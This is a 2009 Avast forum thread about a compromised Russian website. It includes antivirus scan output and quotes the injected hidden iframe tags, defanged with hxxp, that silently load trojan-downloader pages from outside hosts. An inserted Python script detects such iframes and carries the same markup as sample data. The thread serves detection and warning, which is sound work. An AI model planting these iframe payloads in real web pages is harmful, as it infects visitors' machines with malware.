Avast WEBforum

Other => Viruses and worms => Topic started by: sewaq on April 29, 2009, 01:27:06 PM

Title: nasha-russia.tv - HTML:Iframe-inf
Post by: sewaq on April 29, 2009, 01:27:06 PM
hxxp://nasha-russia.tv/
Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: Omid Farhang on April 29, 2009, 01:35:27 PM
A virus or unwanted program has been detected
in the HTTP data on the requested page.

Requested URL:   hxxp://nasha-russia.tv/
Information:        Contains recognition pattern of the HTML/Infected.WebPage.Gen HTML script virus
Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: polonus on April 29, 2009, 09:56:25 PM
Hi sewaq,

DrWeb's av link checker gives it as red - infected -
Checking: hxtp://nasha-russia.tv/
Engine version: 5.0.0.12182
Total virus-finding records: 539455
File size: 45.05 KB
File MD5: 4c7dd71d5934d7cab5a3aeefe3dfd339

hxtp://nasha-russia.tv/ - archive HTML
>hxttp://nasha-russia.tv//JavaScript.0 - Ok
>hxtp://nasha-russia.tv//Script.1 - Ok
>hxtp://nasha-russia.tv//Script.2 - Ok
>hxtp://nasha-russia.tv//Script.3 - Ok
>hxtp://nasha-russia.tv//Script.4 - Ok
>hxtp://nasha-russia.tv//Script.5 - Ok
>hxtp://nasha-russia.tv//JavaScript.6 - Ok
>hxtp://nasha-russia.tv//JavaScript1.1.7 - Ok
>hxtp://nasha-russia.tv//JavaScript1.2.8 - Ok
>hxtp://nasha-russia.tv//JavaScript1.3.9 - Ok
>hxtp://nasha-russia.tv//JavaScript.10 - Ok
>hxtp://nasha-russia.tv//JavaScript.11 - Ok
hxtp://nasha-russia.tv/ - Ok

Checking: hxtp://pagead2.googlesyndication.com/pagead/show_ads.js
File size: 29.44 KB
File MD5: 24c7aba78e61147132b46e48e6743e71

hxtp://pagead2.googlesyndication.com/pagead/show_ads.js - Ok

Checking: hxtp://lotbetworld.cn/in.cgi?income36
File size: 8978 bytes
File MD5: 98ccf1db761c14c99d26177ac88722b1

hxtp://lotbetworld.cn/in.cgi?income36 - archive MAIL
xttp://lotbetworld.cn/in.cgi?income36/ - archive HTML
>hxtp://lotbetworld.cn/in.cgi?income36//Script.0 infected with Trojan.DownLoad.35036

Checking: hxtp://nasha-russia.tv/includes/jscript.js
File size: 2849 bytes
File MD5: 50f24195e48db586910fffb5f7f5a614

hxtp://nasha-russia.tv/includes/jscript.js - Ok
Re: hxtp://virusinfo.info/showthread.php?t=44061

polonus
Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: CharleyO on April 29, 2009, 10:12:28 PM
***

Well, Polonus beat me to it but here is a little more information.

One iframe infection is outside the html tag at the top of the page and looks like this :

<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>
(I changed the http to hxxp to disable the link)

I counted at least 12 javascript infections throughout the page.

There are 2 more iframe infections outside the html tag at the bottom of the page :

<iframe src="hxxp://google-ana1yticz.com/?click=486812" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>

Click the images below to enlarge.


***
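The pattern CharleyO describes above (1x1 iframes with visibility:hidden, injected outside the html element at the very top and bottom of the page) is easy to check for from a saved copy of the page without loading it in a browser. The script below is an added example and is not code from the thread or from any of its participants; the sample page it scans is constructed here to match the description in the post, with the defanged hxxp URLs copied as they appear above, and the tag names, size and style checks are the author's own assumptions about what "hidden iframe" should mean.

```python
"""Flag hidden or injected <iframe> tags in a saved HTML page (added example)."""
from html.parser import HTMLParser
import re

# Constructed sample modelled on the thread's description: one hidden iframe
# before the <html> tag, a normal page body with a legitimate embed, and two
# more hidden iframes after </html>. URLs are defanged exactly as in the post.
SAMPLE_HTML = """<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>
<html>
<head><title>sample</title></head>
<body>
<p>Legitimate content</p>
<iframe src="https://video.example/embed/123" width="640" height="360"></iframe>
</body>
</html>
<iframe src="hxxp://google-ana1yticz.com/?click=486812" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>
"""


def _tiny(value):
    """True when a width/height attribute is 1px or less (tracking-pixel sized)."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", value)
    return bool(m) and int(m.group(1)) <= 1


class IframeAuditor(HTMLParser):
    """Collects iframes that are hidden, tiny, or sit outside <html>...</html>."""

    def __init__(self):
        super().__init__()
        self.depth_html = 0   # > 0 while inside the <html> element
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "html":
            self.depth_html += 1
            return
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        # Injected markup often lands before <html> or after </html>.
        if self.depth_html == 0:
            reasons.append("outside <html> element")
        # width=1 height=1 is the classic invisible frame.
        if _tiny(a.get("width")) and _tiny(a.get("height")):
            reasons.append("1x1 or smaller")
        # Inline CSS that hides the frame from the user.
        style = re.sub(r"\s+", "", a.get("style", "")).lower()
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden via CSS")
        if reasons:
            self.findings.append({
                "line": self.getpos()[0],
                "src": a.get("src", ""),
                "reasons": reasons,
            })

    def handle_endtag(self, tag):
        if tag == "html":
            self.depth_html -= 1


def audit_iframes(html_text):
    """Return a list of suspicious iframe findings for the given HTML text."""
    parser = IframeAuditor()
    parser.feed(html_text)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for f in audit_iframes(SAMPLE_HTML):
        print(f"line {f['line']}: {f['src']}  [{', '.join(f['reasons'])}]")
```

Run it against a page saved with wget or curl (never by opening it in a browser) and it reports the three injected frames with their line numbers and the reasons they tripped the check, while the legitimate 640x360 embed inside the body is left alone. The same "outside html" check will not catch injected script blocks placed within the body, so a full review of a compromised page still means reading through every script tag as CharleyO did.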
Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: !Donovan on April 29, 2009, 10:36:53 PM
Went to the site without pro version and got infected. :-X
Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: CharleyO on April 30, 2009, 12:52:59 AM
***

Since Polonus and I had already checked it out, why did you go there?    ???

We already said it was infected. You need a little more experience before doing such things.


***
Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: !Donovan on April 30, 2009, 02:16:20 AM
***

Since Polonus and I had already checked it out, why did you go there?    ???

We already said it was infected. You need a little more experience before doing such things.


***

I wanted to see what the virus does. ;D Besides, I think I can remove the virus via Boot-Time Scanning!
Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: polonus on April 30, 2009, 02:32:31 AM
Hi Donovansrb10,

People that download viruses to see what they do aren't just average users. These people download viruses in special lab settings, where they cannot infect outside a virtual machine. They have to take a lot of precautions and need a lot of special analyzing tools. Well, if you download the Vitro file infector, you can see what is meant; if you do that you can completely f-disk, format and re-install your Operating System, so-called total recall, not a nice thing to experience, seeing your computer being ruined by a virus. Malware is no plaything, and malware should be kept from computers by all means. The real hero here is the man or woman or kid that did not have a virus for years and years, because he or she or it is computer-savvy and security aware.

polonus
Title: Re: nasha-russia.tv - HTML:Iframe-inf
Post by: DavidR on April 30, 2009, 03:19:46 AM
That goes double when you have absolutely no idea what the payload at the other end of the link could be.

One member who I would also say is more experienced tried this and without a robust back-up and recovery strategy (hard disk imaging, etc.) he ended up formatting his system and reinstalling everything. What he got hit by was Vitro/Virut and you only have to check this forum to see the destruction it reaps, with most ending up on an fdisk, format and reinstall.

So this strategy is IMHO totally stupid, unless you are on a test machine that you wipe after the test.